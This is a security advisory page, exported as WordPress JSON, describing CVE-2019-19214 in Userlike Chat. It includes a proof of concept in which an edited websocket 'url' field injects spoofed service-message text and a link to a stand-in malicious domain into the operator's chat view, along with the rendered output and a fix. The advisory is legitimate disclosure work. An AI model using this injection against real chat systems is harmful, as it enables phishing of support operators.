{"id":16633,"date":"2021-07-07T16:01:42","date_gmt":"2021-07-07T14:01:42","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0058\/"},"modified":"2021-07-19T14:12:43","modified_gmt":"2021-07-19T12:12:43","slug":"usd-2019-0058","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0058\/","title":{"rendered":"usd-2019-0058"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2019-0058 | Userlike Chat<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2019-0058<\/span><br \/><strong>CVE Number<\/strong><span>: CVE-2019-19214<\/span><br \/><strong>Affected Product<\/strong><span>: Userlike Chat<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Insufficient Filtering<\/span><br \/><strong>Security Risk<\/strong><span>: Low<\/span><br \/><strong>Vendor URL<\/strong><span>: <a href=\"https:\/\/userlike.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/userlike.com<\/a><\/span><br \/><strong>Vendor Status<\/strong><span>: Fixed (not verified)<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p><span>Userlike does not handle data received via websockets requests correctly, thus a malicious client may inject content (including links) that is embedded in the operator\u2019s chat view.<\/span><\/p>\n<p><span><\/span><\/p>\n<h3>Introduction<\/h3>\n<p><span>Userlike\u2019s chat software contains an insufficient filtering vulnerability, enabling Customers to send information to chat operators, that may appear to be service messages from the chat system. These spoofed messaged may contain links that are rendered correctly.<\/span><\/p>\n<p>[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/3.png\" title_text=\"3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][\/et_pb_image][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h3><span>Proof of Concept (PoC)<\/span><\/h3>\n<div class=\"x-text\">\n<p>1. [Customer] Start a chat session at the companie\u2019s website<\/p>\n<p>2. [Customer] Intercept traffic including websocket-requests but forward it until the following websocket-request should be sent:<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]42[\"message\",{\"info\":\"chat_info\",\"body\":{\"conversation_id\":126550,\"info\":{\"url\":\"http:\/\/localhost:8000\/userlike_widget_demo.html\",\"page_impressions\":3}},\"context\":4}]<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>2.1 [Customer] Edit the request\u2019s \u201eurl\u201c parameter and forward the request:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]42[\"message\",{\"info\":\"chat_info\",\"body\":{\"conversation_id\":126550,\"info\":{\"url\":\"http:\/\/google.de\/usd<br \/>\nHier kann der Angreifer beliebigen Text schreiben.<br \/>\nKlicken Sie bitte hier: http:\/\/www.evil.de\",\"page_impressions\":3}},\"context\":4}]<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<p><span>3. [Operator] In the operator\u2019s chat view the service message is rendered, including the spoofed content:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]&amp;lt;span&amp;gt;Contact navigated to URL &amp;lt;a class=\"Link\" href=\"http:\/\/google.de\/usd<br \/>\nHier\" target=\"_blank\"&amp;gt;http:\/\/google.de\/usd<br \/>\nHier&amp;lt;\/a&amp;gt; kann der Angreifer beliebigen Text schreiben.<br \/>\nKlicken Sie bitte hier: &amp;lt;a class=\"Link\" href=\"http:\/\/www.evil.de\" target=\"_blank\"&amp;gt;http:\/\/www.evil.de&amp;lt;\/a&amp;gt;&amp;lt;\/span&amp;gt;<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Treat websocket-requests that are sent by the client as regular user controlled data. Make sure to encode or filter user controlled content before embedding and replaying it.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2019-09-18 This vulnerability was found by Konstantin Samuel during a pentest<\/li>\n<li>2019-11-14 Vendor schedules update for this date<\/li>\n<li>2020-04-29 <span>Security advisory released<\/span><\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerabilities were found by Konstantin Samuel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2019-0058 | Userlike Chat Advisory ID: usd-2019-0058CVE Number: CVE-2019-19214Affected Product: Userlike ChatVulnerability Type: Insufficient FilteringSecurity Risk: LowVendor URL: https:\/\/userlike.comVendor Status: Fixed (not verified) Description Userlike does not handle data received via websockets requests correctly, thus a malicious client may inject content (including links) that is embedded in the operator\u2019s chat view. Introduction Userlike\u2019s chat software [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16633","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16633"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16633\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}